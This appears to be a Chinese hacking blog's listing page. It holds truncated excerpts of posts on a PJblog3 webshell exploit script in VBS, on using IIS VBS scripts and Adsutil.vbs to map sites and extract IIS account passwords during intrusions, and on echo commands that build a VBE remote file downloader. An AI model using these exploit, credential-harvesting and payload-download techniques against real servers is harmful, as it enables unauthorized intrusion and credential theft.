PJblog3漏洞利用说明

真想不明白这样的漏洞这么久了官方为什么不修复 到现在还有此类漏洞  伸直更可怕的注册会员直插一句话 工具是用VBS写的,代码如下: If WScript.Arguments.Count <> 2 Then WScript.Echo "Usage: Cscript.exe Exp.vbs 要检测的论坛网址 要检测的用户名" WScript.Echo "Example: Cscript.e...

- 阅读全文 -

iis的几个vbs脚本在渗透中的应用

有时候用aspxshell的iisspy功能看不到网站路径跟域名,可以尝试下下面这个方法 1.查询IIS里的所有网站 C:WINDOWSsystem32>cscript.exe iisweb.vbs /query Microsoft (R) Windows Script Host Version 5.6 版权所有(C) Microsoft Corporation 1996-2001。保留所有...

- 阅读全文 -

使用Adsutil.vbs脚本获取IIS配置信息及账号密码

今晚在搞https://www.webshell.cc/的时候拿下旁站权限,但不能夸到目标站的目录下,眼看目标就在眼前却被最后一道关卡给卡死了。之前也有尝试过pr提权,单asp一执行pr就卡死了。。 无奈之下找了群里龙儿心一起来研究,龙儿心经验不错,到shell上立马就搞定了目标站的路径,获取IIS网站路劲和其他基本信息也是使用一个VBS脚本搞定的,这个在我blog中有一个文章帖出来代码。这里我将就...

- 阅读全文 -

实用vbs

转自:黑鹰小子 1.文件下载(无回显) echo iLocal = LCase(WScript.Arguments(1)) >iget.vbe echo iRemote = LCase(WScript.Arguments(0)) >>iget.vbe echo Set xPost = createObject(“Microsoft.XMLHTTP”) >>iget.v...

- 阅读全文 -